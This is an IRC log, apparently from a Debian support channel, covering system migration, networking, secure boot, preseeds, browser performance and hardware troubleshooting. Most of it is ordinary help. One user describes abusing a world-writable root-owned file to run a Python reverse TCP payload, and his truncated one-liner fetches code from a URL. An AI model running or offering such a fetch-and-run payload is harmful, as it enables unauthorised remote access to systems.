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865[05:23:50] <SpaceAce> and full filesystem
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867[05:24:16] <ryouma> what seems straightforward has not been
so in debian ime
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868[05:24:49] <ryouma> tons of things to watch for, make sure
the chroot is correct, /etc/*tab, etc.
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869[05:24:55] <ambient> ryouma, tor browser.
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870[05:25:04] <qman__> SpaceAce: yes, just make sure you stop
mysql first, etc
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871[05:25:12] <qman__> to make sure it stays consistent
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872[05:25:12] <SpaceAce> i'll stop everything before i
proceed
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873[05:25:14] <ryouma> ambient: somebody else just brought that
up recently
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874[05:25:34] <qman__> you'll boot a live environment in
your destination, format the filesystem, and set up ssh so you can
rsync over
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876[05:26:08] <qman__> rsync the data, tweak configs like
/etc/fstab and /etc/hostname and /etc/hosts as needed, install the
bootloader (probably grub), and be able to boot
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879[05:27:41] <missmbob> if you actually wanted to make an iso
of the running system you can use systemback
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881[05:27:54] <ambient> ryouma, and the answer is...?
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883[05:28:26] <ryouma> but mainly the problems i had were to do
with bugs and stuff i did not understand in grub and the ramdisk for
teh kernel
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885[05:28:49] <ryouma> ambient: i don't know, are there no
bugs on it? is this only recent? it has always had such problems
afaik
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887[05:29:01] <ambient> oh pfff
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889[05:29:23] <ryouma> debian adds some kind of extension to the
name, then tries to dl a url that does not exist on the server. you
could hack the script to get the correct url maybe. dunno.
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890[05:29:41] <awal1> Any nice script for restore apps minimized
to system tray?
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891[05:29:42] <ryouma> but then people say the thing
doesn't download itself either, so that might not be related to
the script
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897[05:30:35] <awal1> I think that icewm have that feature, but
I don't find how it's done googling
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900[05:32:07] <awal1> also kde somewhere in advanced settings
have a feature for minimize to tray any app (and restore it via
keyboard shortcut)
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901[05:32:35] <missmbob> you can use the ancient alltray too
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902[05:33:06] <awal1> I tried it under wheezy it was very buggy
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903[05:33:16] <missmbob> it does suck, yeah.
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909[05:35:59] <awal1> I think it was like once iconified usinng
alltray some apps never "restore"
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910[05:36:38] <missmbob> oh yeah. it would actually restore them
to different workspaces so you never saw it
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911[05:36:58] <awal1> maybe; I dont remember
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912[05:37:42] <nkuttler> awal1: restoring sounds like a job for
a panel/taskbar, not the systray
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913[05:37:58] <nkuttler> or a job for the app that shows an icon
there
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917[05:39:07] <josndir> How do I ssh into another computer with
an ethernet cable connected to it from mine allowing me to control
it?
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918[05:39:26] <josndir> ssh is supposed to be set up on it, how
do I get the ip?
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919[05:39:27] <nkuttler> josndir: um.. ssh host?
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922[05:40:14] <awal1> nkuttler, going to boot my debian icewm vm
and maybe I find what icewm does exactly
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926[05:40:20] <nkuttler> josndir: where does the target get its
ip from?
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927[05:40:22] <josndir> Also, I am connected to a wireless
network on my computer which is connected to the internet, and when
I connect to the other computer (in my attempts) it disconnects me
from the internet for some reason
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929[05:40:42] <nkuttler> josndir: "connect"?
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931[05:41:01] <nkuttler> josndir: do you have some kind of
router in this setup?
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933[05:41:50] <josndir> nkuttler: I've gathered that I
should setup a dhcp server in order to receive its ip through tshark
-i eth0 maybe :s
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934[05:42:22] <josndir> the router which I'm wirelessly
connected to connects me to the internet if that's what you
mean
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935[05:42:23] <nkuttler> josndir: if both boxes are directly
connected, no need for that. just give both nics ips on the same
network
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937[05:43:06] <josndir> nkuttler: the other computer isn't
wirelessly connected
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938[05:43:13] <nkuttler> josndir: yeah
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939[05:43:13] <josndir> to the internet
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940[05:43:30] <nkuttler> josndir: do you only want to ssh into
that computer, or do you actually want to share your internet
connection?
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942[05:43:54] <josndir> sharing the internet connection would be
useful..
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943[05:44:04] <josndir> so let's go with that
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944[05:44:17] <nkuttler> josndir: well, the first step is to be
able to ping each other
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945[05:44:20] <josndir> but I also want to be able to ssh into
it
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947[05:44:58] <missmbob>
replaced-url
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948[05:45:04] <josndir> nkuttler: but how do I find out its ip?
as soon as I turn up my eth0 I get disconnected from my wireless
internet
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950[05:45:38] <nkuttler> josndir: how do you turn it up?
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952[05:46:03] <josndir> nkuttler: ifup eth0
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953[05:46:16] <nkuttler> josndir: and what's in your
/etc/network/interfaces ?
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954[05:47:07] <josndir> nkuttler:
replaced-url
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955[05:47:28] <nkuttler> josndir: yeah, you don't want dhcp
there, you want a static ip
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956[05:47:43] <josndir> hmm why not dhcp :s
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957[05:47:49] <josndir> I thought it does it all for me :D
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959[05:48:08] <nkuttler> josndir: sure, if you configre a dhcpd
for your wired connection
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960[05:48:20] <nkuttler> josndir: but there's nothing on
your wired network
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961[05:49:04] <josndir> only that one computer I want to connect
to, and I also want to be able to connect to a router with a wire to
access the internet at higher speeds
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963[05:49:16] <nkuttler> josndir: you have a wired router?
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964[05:49:38] <josndir> nkuttler: wireless and wired
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965[05:49:41] <nkuttler> josndir: then plug both boxes into
that. don't link them directly
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966[05:49:54] <nkuttler> that should be *much* easier
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967[05:50:00] <josndir> nkuttler: right now I only have access
to a wireless one
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968[05:50:26] <nkuttler> right now you're contradicting
yourself
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969[05:50:54] <nkuttler> so, anyway, static ip, on *both* boxes,
then ping each other, then read the arch wiki guide, it looks good
enough
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970[05:51:17] <josndir> I have a wired router at another place,
so I don't want to set dhcp up in a way that I can't
connect to the internet with a wire anymore you see :\
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972[05:51:33] <josndir> but right now for the next weeks I only
have a wireless router
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975[05:52:30] <josndir> nkuttler: how do I figure out the ip of
the other computer? it's headless and I only have ssh running
on it
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976[05:52:41] <josndir> so I can only see the ip if I ssh into
it
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977[05:53:01] <nkuttler> josndir: why do you think it even has
an ip?
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978[05:53:08] <nkuttler> josndir: is it configured to use dhcp?
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979[05:53:09] <missmbob> sudo arp-scan 192.168.0.0/24
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981[05:53:33] <josndir> yes nkuttler
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982[05:54:48] <nkuttler> josndir: yes, then you'll need to
run a dhcpd on the wired interface
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984[05:55:15] <josndir> so my /etc/network/interfaces is
correct?
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985[05:55:40] <nkuttler> josndir: no
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990[05:56:43] <nkuttler> josndir:
replaced-url
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1002[06:03:46] <josndir> nkuttler: my initial problem, however,
is that if I turn up my eth0 interface it kicks me off the wireless
internet for some reason, and I still need to set up my static
interface without knowing what ip values to use. I know that most
networks have the 192.168.x.x address but my wireless for example is
10.36.1.146
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1021[06:05:46] <josndir> nkuttler: also, what does the
"address" stand for (from debian network configuration
wiki) and the "gateway" ? is the address the address of my
wireless router or my laptop which was wirelessly assigned to me?
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1025[06:06:20] <josndir> (sorry I am a complete noob with
networking)
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1039[06:13:07] <Heston> is it normal to lose all input
responsiveness while my swap is being utilized?
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1040[06:14:07] <Heston> I'll open one too many firefox tabs
any desktop locks up completely until my swap partition is finished
being written to...
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1041[06:14:25] <Heston> and my desktop*
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1045[06:17:27] <awal1> nkuttler, right, it's a matter of
taskbar. Icewm have a file called 'winoptions' used to
configure settings for individual application windows. Example:
"Firefox.tray: Exclusive" adds an icon for firefox in
system tray (and never creates a task panel button)
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1047[06:18:33] <awal1> missmbob, ^ works better than using
alltray :P
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1052[06:18:55] <awal1> for icewm users, I meant (I'm not)
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1055[06:19:47] <Freemon> hi rooom
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1057[06:20:21] <Freemon> any1 alive?
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1058[06:21:17] <awal1> only you; life ended 1 minute ago
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1062[06:28:35] <Freemon> aww
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1063[06:28:38] <Freemon> i have a problem
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1064[06:29:21] <Freemon> my desktop icons are missing .. whenever
i turn on the show desktop icons the icons seems to appear in 2
pairs each over lapping each other
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1065[06:29:35] <missmbob> you dont have a problem. you have
unresolved situations. once you fix those situations you'll be
all good
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1068[06:30:00] <Freemon> problem is an unresolved situations
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1071[06:30:46] <Freemon> now i can click on 1 pair of icons and
other pain of icons i cant they are like after image of the former
icons
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1072[06:30:55] <Freemon> what did i messed up
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1075[06:31:22] <Freemon> every time i reboot its happnes and i
have no idea wat caused it
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1076[06:31:25] <missmbob> this sounds like stretch. is it?
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1077[06:31:31] <Freemon> yes
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1078[06:31:36] <missmbob> !debian-next
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1079[06:31:37] <dpkg> #debian-next is the channel for
testing/unstable support on the OFTC network (irc.oftc.net), *not*
on Freenode. If you get "Cannot join #debian-next (Channel is
invite only)." it means you did not read it's on
irc.oftc.net.
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1080[06:31:44] <missmbob> they'll know better
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1081[06:31:51] <Freemon> i tried their its like a empty house
with no replies
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1082[06:32:30] <Freemon> is it a bug ? or is it me
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1083[06:32:50] <missmbob> i wouldnt know. i dont use stretch so i
dont know what's currently boken.
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1085[06:33:28] <missmbob> that doesnt sound like stable desktop
to be sure
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1086[06:33:41] <Freemon> hmmm ok
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1087[06:33:47] * themill wonders when Freemon asked in #debian-next
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1090[06:34:41] <n4dir> If #debian-next doesn't give replies,
there are still other options trying to get help, forums,
mailing-lists, etc
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1091[06:34:50] <Freemon> yesterday
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a few days I just managed to do it
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preseed file?
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1160[07:19:39] <somiaj> nwe: I don't think you need anything
special for efi, what determines efi is how the installer is boot,
not a config option in the installer
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1164[07:21:13] <missmbob> maybe the entry he's talking about
would be the pem if secureboot was supported?
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1166[07:21:47] <somiaj> unsure, I didn't think debian
supported secure boot.
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1168[07:25:02] <nwe> I have an preseed for non-efi thats
working.. but now when I trying on a server that running efi, I cant
installed the server because it complain about disk.. and I trying
with this
replaced-url
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1169[07:25:41] <nwe> with out success,
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1170[07:26:53] <nwe> and If I using this
replaced-url
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1171[07:26:55] <missmbob> you should really be asking
#debian-boot
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1174[07:28:02] <n1b> Do you need to have Python installed for
Debian to work?
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1175[07:28:09] <missmbob> yes
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1177[07:28:39] <somiaj> nwe: I am not that familar with
preseends, but I see method{ biosgrub } for the first partition?
That seems a bit odd for a gpt partition table and using efi, but I
don't know enough about preseeds to know what options you need.
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1179[07:30:05] <nwe> when I usin the uefi-stuff in the preseed I
got tis error.. Failed to partition the selected disk |
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1180[07:30:08] <nwe> | This happened because the selected recipe
does not contain any |
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1181[07:30:11] <nwe> | partition that can be created on LVM
volumes
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1186[07:32:10] <somiaj> nwe:
replaced-url
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1236[08:07:53] <MarcoNL> Hi all, I know it's against the
rules to place a question on stackexchange and here, but is there
any way to get an answer for my preseed related question? I've
put it on SE Unix right now, but we're 2 days later now and no
response since.
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1245[08:10:46] <somiaj> MarcoNL: not many here are that
knowledgable on preseeds, you can ask here, but not sure if
you'll get a response
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1253[08:14:39] <MarcoNL> somia: is there a right place for
preseed questions then?
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1256[08:15:50] <n4dir> perhaps a mailing list, the question would
be which one
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1264[08:17:12] <MarcoNL> I've been searching for 2 weeks now
to get an answer to my problem
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1284[08:27:16] <Xz> hi there, I'm in need of USB
persistent-live distribution booting in secure mode
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1285[08:27:29] <missmbob> debian is not it
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1286[08:27:30] <somiaj> secure mode?
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1287[08:27:31] <Xz> I know debian doesn't support that yet
out of the box
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1288[08:27:36] <Xz> UEFI secure boot
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1289[08:27:38] <Xz> but
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1290[08:27:47] <somiaj> yea you won't get that with debian.
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1291[08:28:00] <Xz> Ubuntu works on my laptop (employer owned
with bitlocker on SSD)
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1293[08:28:07] <missmbob> debian is not ubuntu
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1294[08:28:25] <Xz> now, what about I just swap UBUNTU filesystem
with Debian one?
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1295[08:28:50] <Xz> if I can get Ubuntu all the way to grub and
past that, I can as well tinker with that and get that grub to
kick-off debian, right?
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1301[08:29:39] <ZtolenClothez> I'm having an odd problem
after upgrading to stretch. I have a couple of luks partitions, when
they are enabled the system refuses to boot, the luks password
prompt at boot never comes up. I found that setting the kernel
parameter 'single' allows it to appear and boot as normal
after the process. I also notice the plymouth theme can't be
changed. I tried changing it repeatedly, running update-initramfs,
it doesn't change.
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1307[08:31:42] <Xz> so what do you think about mixing UBUNTU
bootloader with debian?
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1308[08:31:47] <Xz> for my system?
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1309[08:31:56] <Vizva> upgrading to stretch?
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1310[08:32:02] <Xz> my laptop is owned by employer and it has
UEFI secure boot + SSD that I don't want to mess with
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1311[08:32:19] <somiaj> Xz: we don't really support mixing.
You are welcome to play around. Can you not disable secure boot?
Many laptops allow that.
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1315[08:32:57] <ZtolenClothez> Vizva, if you mean me, yes
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1316[08:33:26] <Vizva> you should go back to your backup, to
jessie then copy the system and upgrade this testsystem to stretch
again
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1317[08:33:29] <somiaj> Xz: also debian live images do not
support efi, so if you are after a live system, I'd stick with
ubuntu.
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1320[08:33:55] <ZtolenClothez> Vizva, what would prevent the same
thing from happening?
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1323[08:34:06] <Vizva> its testing
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1324[08:34:14] <Vizva> you test it to nowhere?
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1325[08:34:20] <ZtolenClothez> what?
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1326[08:34:37] <Vizva> if its not work and you upgrade to testing
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1327[08:34:45] <Vizva> and the test fails
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1328[08:34:49] <ZtolenClothez> it boots, the issue seems to be
something installed, which redoing the process would not change
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1329[08:35:03] <ZtolenClothez> it boots with the workaround as I
said
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1331[08:35:17] <ZtolenClothez> it only fails when
'single' is not a kernel parameter, the luks prompt
doesn't show up
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1340[08:37:31] <Vizva> you can still open this partition with
another system?
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1343[08:38:35] <ZtolenClothez> yes, and even boot as normal with
the workaround
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1347[08:39:35] <Vizva> could be a jobsite place
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1353[08:41:06] <Vizva> ok
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1354[08:41:26] <Vizva> you can give the password without see a
password prompt
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1355[08:41:43] <Vizva> you did try?
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1360[08:42:55] <Vizva> <ZtolenClothez> i didsee it happen
in vm, password prompt dont show up but can give a password
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1363[08:45:28] <ZtolenClothez> I tried, can't give password.
It stalls on the systemd event trying to load dm partitions
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1364[08:46:07] <Vizva> you could pack this partitions in lvm and
try again
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1365[08:46:21] <ZtolenClothez> i can do the whole thing over yes
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1366[08:46:26] <ZtolenClothez> I know that
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1367[08:46:32] <Vizva> maybe it works then
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1368[08:46:43] <ZtolenClothez> it should but it's not my
desire atm
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1372[08:47:25] <ZtolenClothez> removed more packages will reboot
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1377[08:50:12] <Xz> somiaj: I can disable secure boot, but then I
would have to do it everytime I switch between USB-Linux and
SSD-win10
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1378[08:50:19] <Xz> somiaj: too much work
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1379[08:50:41] <Xz> somiaj: especially that my bios needs to
reboot and enter some number to turn off secure mode
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1380[08:50:49] <Xz> somiaj: = it takes 1+ min
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1381[08:50:57] <Xz> somiaj: and is supper unfriendly to do
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1382[08:51:03] <Xz> somiaj: I tried live-ubuntu
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1383[08:51:21] <Xz> somiaj: it kind of works, but then one day it
just wouldn't let me ssh to my server
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1384[08:51:28] <somiaj> Then I would find a distro that supports
secure boot and maybe has a good live system, debian isn't one
of those.
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1385[08:51:32] <Xz> somiaj: ssh client after entering window
would just hang
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1386[08:51:50] <Xz> somiaj: and I was even able to ssh to exact
same system from my win10, everything on the server side was fine
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1387[08:51:56] <Xz> somiaj: that's what pisses me off about
Ubuntu
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1388[08:52:00] <Xz> somiaj: random crap just doesn't work
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1389[08:52:08] <Xz> somiaj: I am very rarely disappointed by
debian
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1391[08:52:45] <Xz> somiaj: well, I heard RHEL supports
secure-boot
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1392[08:52:49] <Xz> somiaj: but RHEL is not free
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1393[08:53:03] <Xz> somiaj: and RHEL is more of a server type of
distribution
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1394[08:53:28] <Xz> somiaj: other than that Fedora might work,
but Fedora is similar to Ubuntu - random crap doesn't work
sometimes
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1395[08:53:36] <n1b> DO you have to use bash when using debian?
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1396[08:53:37] <Xz> somiaj: debian nearly always work as expected
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1398[08:53:49] <Xz> n1b: I would prefer bash, why is that
question ?
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1399[08:54:05] <Xz> n1b: do you have non-bash secure-boot enabled
live debian distro by any chance? :)\
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1400[08:54:08] <somiaj> anyways, this has little to do with
debian, and this is not the place to go on about. ##linux may have
some suggestions for a secure boot live system.
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1402[08:54:23] <Xz> somiaj: well, I really want debian
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1403[08:54:26] <somiaj> n1b: no, you can install other shells.
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1404[08:54:36] <Xz> somiaj: so I thought maybe somebody here has
any experience with live systems and secure boot
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1405[08:54:40] <somiaj> Xz: it doesn't support secure boot
and the live system dosen't support efi. Deal with it.
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1406[08:54:52] <Xz> somiaj: well, I know people boot debian in
secure mode
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1407[08:55:04] <Xz> somiaj: the fact that debian officialy
doesn't support that doesn't mean it cannot be done
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1409[08:55:22] <somiaj> Xz: I'm sure it can be done with
some modification, but out of the box and live systems will not
support it. Live dosen't even support efi.
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1410[08:55:24] <Xz> somiaj: also, AFAIK around enf of January
debian is actually planning on supporting secure boot
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1411[08:55:32] <Xz> somiaj: I'm fine with tinkering
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1413[08:55:42] <Xz> somiaj: I can go on my own and create
live-distro from scratch
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1414[08:55:54] <Xz> somiaj: just looking for some guidance, not
out-of-the-box solution
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1415[08:56:01] <somiaj> sure maybe one day, but this is a support
chanell mostly for debian stable and what is supports, not
tinkering. No need to continue on about this topic
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1417[08:56:22] <Xz> somiaj: where do I go then? debian on-line
forum? stackoverflow?
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1420[08:56:57] <somiaj> Xz: unsure the best place to get some
interest to help with this. First thing I would attempt is getting
the live system to boot in efi, which it dosen't by default.
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1424[08:57:33] <Xz> somiaj: well, I can boot ubuntu fine, so what
I would be looking to do from now on is to kick off debian system of
ubuntu grub
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1425[08:58:05] <Xz> somiaj: ubuntu uses initramfs, boots small
linux distro and then mounts full OS and does 'chroot'
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1426[08:58:27] <Xz> somiaj: from that small initramfs I could
chroot into debian instead of ubuntu
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1428[08:58:56] <Xz> somiaj: technically it makes sense to do it
that way
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1429[08:58:58] <somiaj> Xz: again this is not the right form to
continue this conversation.
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1434[09:01:07] <Xz> somiaj: anyway, thanks for letting me know
it's not supported
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1435[09:01:10] <missmbob> just keep an eye for bug #821053 ...not
that i'll help with the live bit.
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1436[09:01:11] <judd> Bug
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1440[09:02:25] <Xz> missmbob: thanks mate
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1443[09:04:48] <Boompak> make localmodconfig give me this warning
'module ath did not have configs CONFIG_ATH_COMMON'. What
does this mean?
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1461[09:15:52] <Vizva> <Boompak> newer kernel now?
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1470[09:19:53] <darxmurf> I'm looging for a working
documentation of how to configure samba+ldap+kerberos, any advises ?
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1471[09:21:17] <Boompak> Vizva: yes, I am trying to configure my
kernel.
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1472[09:21:57] <darxmurf> and why now when I try to change a
local account password, it's requesting the actual kerberos
password ?!
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1502[09:32:22] <n1b> Is it better to dual boot Windows if you
want to play games?
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1503[09:33:05] <somiaj> n1b: depends on what games and the likes
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1504[09:33:18] <somiaj> I play games in steam and wine just fine,
but it is kinda selective which ones are avilable
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1522[09:38:56] <GPenguin> n1b: if you have enough disk space and
a license for windows then i find the dual boot option the better
one
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1525[09:39:41] <n1b> do you need to wipe linux first and then
install windows?
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1526[09:40:23] <somiaj> you don't need to wipe linux, but if
you install windows second you'll have to manually make your
linux system bootable again
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1527[09:40:25] <GPenguin> i dont think you need to wipe linux,
just re-install the boot manager from a livecd
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1528[09:40:26] <somiaj> !fixmbr
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1529[09:40:27] <dpkg> To reinstall <GRUB> boot to your
Debian install disk/live CD, switch to the other console (Alt-F2),
mount your root filesystem (mount -t ext4 /dev/whatever /target ;
mount --bind /dev /target/dev ; mount -t proc none /target/proc ;
mount -t sysfs none /target/sys), chroot into it (chroot /target),
run "mount /boot/efi" on EFI and "update-grub
&& grub-install /dev/whatever". See also <rescue
mode>, <dual boot guide>, <supergrub>.
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1530[09:40:30] <somiaj> is a rough guide
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1532[09:40:46] <GPenguin> cool
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1539[09:43:35] <GPenguin> oh, i used to bind mount all 3, proc,
dev and sys
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1555[09:51:20] <RebelCoder> Guys, Debian is the only distro, that
works good on my NVidia Optimus notebook with Bumblebee.
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1556[09:51:51] <GPenguin> \o/
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1560[09:52:52] <RebelCoder> But I still have one problem: I can
run apps/games with optirun/primusrun command and it works just
fine, everything is fast and soomth, BUT Browsers. both, Chromium
based and Firefox are slow, seem not to be accelerated at all...
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1562[09:53:31] <RebelCoder> If I open like 10 tabs in one of
them, and let's say play Youtube (HTML/Flash) video, my CPU
usage is high and fan blows like crazy.
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1564[09:53:46] <RebelCoder> Everything else seems to be
accelereated just right....
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1565[09:53:49] <RebelCoder> Any ideas ?
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1566[09:54:27] <RebelCoder> Browsers become super slow with more
then 10 tabs, and use a lot of CPU
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1569[09:54:50] <RebelCoder> I have a i7 Quad-Core (8 threads) +
nVidia 780M
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1570[09:55:24] <RebelCoder> I can play Metro Last Light on max on
this notebook in Debian, but browsers are so slow...
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1571[09:55:25] <GPenguin> RebelCoder: do you run the browsers in
full screen? is it better when you select a smaller window size?
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1572[09:55:39] <RebelCoder> No. Not fill screen/
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1573[09:55:45] <raidghost> To run debian installation in
UEFI-mode is that BAD?
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1574[09:55:50] <RebelCoder> Small windows and spread around
desktops
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1575[09:56:04] <RebelCoder> *not full screen
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1578[09:56:49] <valentt> morning all
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1579[09:56:51] <Kryczek> Hi! I can't seem to find out why
replaced-url
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1580[09:57:05] <Kryczek> There does not seem to be any AMD opencl
platform on
replaced-url
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1581[09:57:27] <Kryczek> good morning valentt
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1585[09:58:08] <RebelCoder> Anyone else has that problem with
Browsers being super slow on Debian ?
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1586[09:59:26] <RebelCoder> Drivers (bumblebee/primus) are
installed correctly. Desktop and other apps runs fast and super
smooth. Games like Metro Last Light run perfectly fine with
primusrun command, but browsers (Chromium-based, FireFox) are
crawling...
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1587[09:59:54] <valentt> I have one question that I'm
ashamed I don't know how to figure out on my own... but here it
goes... is it possible to gives user access to subdirectory if they
don't have access to root directory above it?
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1588[09:59:55] <RebelCoder> It seems, that HTML/Flash stuff is
not accelerated at all in any browser
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1589[10:00:49] <n1b> it is in chrome
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1591[10:01:59] <DexterF> valentt, create a group, chgrp subdir to
grp, add user to group, chmod g+rwx the subdir
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1593[10:02:54] <DexterF> RebelCoder, only real support on linux
is chrome, chromium and vivaldi (which uses chromium as a render
engine) which use pepper flash which is maintained by google as part
of an agreement with adobe
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1596[10:03:10] <Kryczek> valentt: it's possible if you can
make the parent directory/directories have the execute bit for the
group, or for everyone as a last recourse
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1597[10:03:28] <valentt> DexterF, thaks
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1598[10:04:04] <RebelCoder> DexterF, I use Chrome-based browser
and tried firefox too
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1599[10:04:17] <jelly> RebelCoder, DexterF: actually adobe took
back flash support some time last year, and now they provide the
latest version in both ppapi (chrome) and npapi (firefox) builds
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1600[10:04:30] <RebelCoder> both become unusable after like 10
tabs and 1 or two YouTube videos... very strange
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1601[10:04:34] <DexterF> raidghost, UEFI itself is bad. running
debian in it requires the kernel to be signed with a key known to
uefi, not sure about the situation with self compiled kernels or 3rd
party ones in 2017
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1602[10:04:58] <Kryczek> valentt: for example I could `chmod 711
/home/kryczek/nolisting/` and `chmod 755
/home/kryczek/nolisting/forvalentt/`, then you cannot see the
contents of the "nolisting" parent but you can traverse it
and then see the contents of "forvalentt"
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1603[10:05:32] <RebelCoder> I have a feeling, that my
Bumblebee/primus (dual-gpu) notebook somehow confuses browsers and
they are not accelerated at all...
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1604[10:05:34] <RebelCoder> Hmm...
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1605[10:05:37] <Kryczek> valentt: if you and I were in the same
group then I can restrict it even further with modes 710 and 750
respectively
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1606[10:05:38] <DexterF> RebelCoder, optimus... hybrid, intel and
nvidia? and you switch them? which does the browser run in?
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1607[10:06:03] <DexterF> jelly, did not know that, thanks. still
flash must die :)
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1608[10:06:30] <RebelCoder> I don´t switch. Everything
(desktop, apps) runs on Intel by default...and if I want to run a
specific app/game on NVidia, i do: primusrun ./game
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1611[10:07:11] <RebelCoder> If I do that to a browser and force
it on Nvida... my cooling fan just explodes even if browser just
sits there...
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1612[10:07:28] <DexterF> RebelCoder, fancy filesystem? how much
RAM? swap setup? hdd or ssd?
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1613[10:07:34] <RebelCoder> So it seems, that both browsers are
not using any of the cards and are CPU bound
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1614[10:07:59] <RebelCoder> i7 (Quad-Core, 8 threads), SSD, 16GB
Ram
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1615[10:08:09] <RebelCoder> It is a laptop
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1618[10:08:40] <RebelCoder> I run TONS of apps on my 2 screens, 8
desktops. Everything runs super smooth, but browsers...
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1620[10:08:43] <DexterF> RebelCoder, browser on primusrun any
better?
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1621[10:08:43] <RebelCoder> no SWAP space...
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1623[10:09:17] <RebelCoder> Have not tried much,. but it does
kick in my cooling fan to a max just runnign the browser with
primusrun
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1626[10:09:42] <RebelCoder> Games with primus - ok, it renders
stuff, but browser, just sitting there... hmmm
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1628[10:09:55] <RebelCoder> i will try somethign else...
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1630[10:09:59] <RebelCoder> today.
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1631[10:10:10] <RebelCoder> jsut wondered if anyone else had this
problem and fixed it somehow
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1632[10:10:12] <DexterF> RebelCoder, for testing, create a swap
file of say 1gb or 2 and activate that as swap. slim chance that
they don't really need it but constantly are calling out to it
"just in case". not quite sure all programs out there are
yet ready to be ok like that without swap, especially ram hungry
ones
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1636[10:10:52] <RebelCoder> I have 40% ram free at all times. so
never used Swap space
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1637[10:10:58] <RebelCoder> will give it a try!
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1639[10:11:00] <RebelCoder> thanks
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1640[10:11:13] <DexterF> RebelCoder, memory management works in
mysterious ways :)
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1641[10:11:22] <RebelCoder> Yeah... i guess..
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1704[10:46:15] <python123> hi, Im new to python. I have a
scenario from a pentest whereby i have a file with 777 permission
that is owned by root and has the group of root. I want to therefore
abuse this poor configuration and execute a python reverset tcp
payload to my machine. The command i want to execute is python -c
"import urllib2; r = urllib2.urlopen('replaced-url
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1705[10:46:21] <python123> command line without any problem i
just need to work out how to call it.
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1770[11:27:34] <jelly> python123: write the script into the file
and execute it?
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1772[11:27:45] <jelly> not sure how this is a debian question
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1776[11:29:08] <carp> Hi, I am using fresh install of debian
jessie. My mouse keeps freezing. It has just done so again. I can
still type though. Luckily I had irc already open on a different
room. If anyone wants to give me a hand with getting the terminal
open and using dmesg to try and work out whats going on that would
be great.
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1777[11:29:26] <carp> im not sure what all the keyboard shortcuts
are etc.
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1779[11:29:45] <carp> if i suddenly leave, thats because the
whole thing froze.
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1789[11:31:41] <carp> I take out the usb mouse and plug it into
the front of the tower instead, and its not immediately moving
still.
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1793[11:32:11] <c-c> hi carp
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1794[11:32:18] <c-c> can you $ lsusb
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1795[11:32:28] <c-c> or $ lshw
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1796[11:32:46] <c-c> also see if errors appear in $ dmesg after
plugging/freezing
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1797[11:32:51] <carp> i plug in a different mouse and that doesnt
work either.
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1798[11:33:18] <carp> c-c: Hello. I will try this. ive forgotten
the command to get the terminal up with keyboard shortcut
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1802[11:33:47] <c-c> carp alt+F2 and type the command for your
terminal
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1813[11:35:39] <missmbob> you dont care if the keyboard goes away
testing something, right?
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1814[11:35:49] <carp> c-c: im using gnome3. alt+f2 does bring up
a command line, but when i type lsusb (or sudo lsusb) it just
disappears. the gnome3 command line is different to the proper
terminal window (the whole screen kind of fades to black at the
edges and its just a single command line (not a separate window).
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1815[11:36:15] <c-c> carp alt+f2, type xterm, then lsusb
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1817[11:36:27] <c-c> basically, you need a terminal
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1818[11:36:42] <carp> c-c: ok that worked.
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1823[11:39:18] <carp> 4 devices found, 2 of them are mice. I have
a usb corded mouse that i use. I also have a usb dongle for an old
mouse plugged in. it has detected both. i will take out the dongle
now.
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1824[11:39:29] <asdfasd> Guys, I have a physical network card
with two ports on it. My system automatically sets portno=0 as
default and I can't seem to change it. I can echo changes to
the sysfs-file for the portnubmer but these isn't persistent
across OS reboots
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1826[11:40:18] <missmbob> dont unplug the mouse :P
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1829[11:40:45] <carp> lshw gives readout bash command cannot be
found
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1832[11:41:06] <asdfasd> I've started to look towards the
file sysctl.conf for makinjg apersistent change, but when i list the
different parameters available for my system with sysctl -a, I cant
find a paramter named portno
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1834[11:41:10] <c-c> capr well, it probably needs to be apt-get
installed
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1835[11:41:11] <asdfasd> Anyone can help me in the right
direction with this?
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1836[11:41:11] <missmbob> yeah there's more going on here.
i'm guessing the cpu is overheating
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1838[11:41:32] <nirvanko> How can I see the space a particular
package takes? I would like to remove all packages that I don't
need.
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1844[11:42:42] <carp> c-c: ok i installed it and run it. gives a
big read out.
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1845[11:42:42] <missmbob> nirvanko: you might like this: aptitude
search ~i -O installsize -F"%p %I"
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1848[11:43:06] <c-c> carp so lshw and lsusb tell you about which
devices are detected
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1849[11:43:23] <c-c> carp: with dmesg errors it might help to
find the problem
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1851[11:43:39] <carp> c-c: yep ok ill try dmesg now.
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1854[11:44:04] <carp> can i scroll up in the terminal window to
read the top part of the readout?
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1856[11:44:15] <nwe> with the partition?
replaced-url
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1858[11:44:43] <c-c> carp maybe you could alt+f2 and run $
gnome-terminal
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1859[11:44:51] <nirvanko> missmbob: thanks, I'll try
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1861[11:45:35] <carp> c-c: yes, perfect
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1866[11:46:32] <carp> c-c: wow the dmesg readout is huge!
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1869[11:47:17] <c-c> carp: you can also read it with an editor
from the dmesg file
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1870[11:47:35] <carp> ok, this is working for now.
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1872[11:48:37] <c-c> carp: perhaps open /var/log/dmesg before
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1874[11:48:58] <c-c> note the last position, then cause the
freeze, and see what is printed after
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1875[11:49:08] * c-c goes back to work
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1877[11:49:24] <carp> c-c: Thankyou very much for the help
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1878[11:49:34] <c-c> thanks 8)
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1880[11:50:18] <missmbob> if you can ssh in it'd be fun to
see if this would bring input back: sudo rmmod usbhid; sleep 2;sudo
modprobe usbhid;
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1882[11:51:27] <c-c> carp !NOTE I mistyped the dmesg location
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1883[11:51:40] <c-c> carp !Note the correct path is
/var/log/messages
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1885[11:52:11] <carp> there are several things that are bolded.
for example: perf interrupt took too long. lowering
kernel.perf_event_max_sample_rate to 25000
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1886[11:52:14] <carp> c-c: ok thanks
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1888[11:52:27] <missmbob> carp: uname -a ?
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1889[11:53:17] <carp> missmbob: Hello. ah are these extra things
for me to try. thankyou. ill just finish reading dmesg quickly.
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1894[11:54:30] <carp> get event status notification: 4a 01 00 00
10 00 00 00 08 00
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1897[11:56:42] <carp> qc timeout (cmd 0xa0). TEST_UNIT_READY
failed (err_mask=0x5). limiting SATA link speed to 1.5 Gbps.
limiting speed to UDMA/100:PI03.
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1900[11:58:53] <carp> earlier on it says: PCI Interrupt Link
[APC1] enabled at IRQ 16. and: PCI Interrupt Link [AAZA] enabled at
IRQ 22.
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1902[12:00:16] <carp> just before that: coretemp coretemp.0:
Using relative temperature scale!
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1906[12:01:13] <carp> there are other PCI Interrupt Link messages
that are bolded.
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1908[12:02:37] <missmbob> please uname -a
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1909[12:02:46] <carp> PNP: PS/2 appears to have AUX port
disabled, if this is incorrect please boot with i8042.nopnp
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1911[12:03:11] <carp> missmbob: Hi, ok lets try this
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1914[12:05:02] <carp> Linux debian 3.16.0-4-686-pae #1 SMP Debian
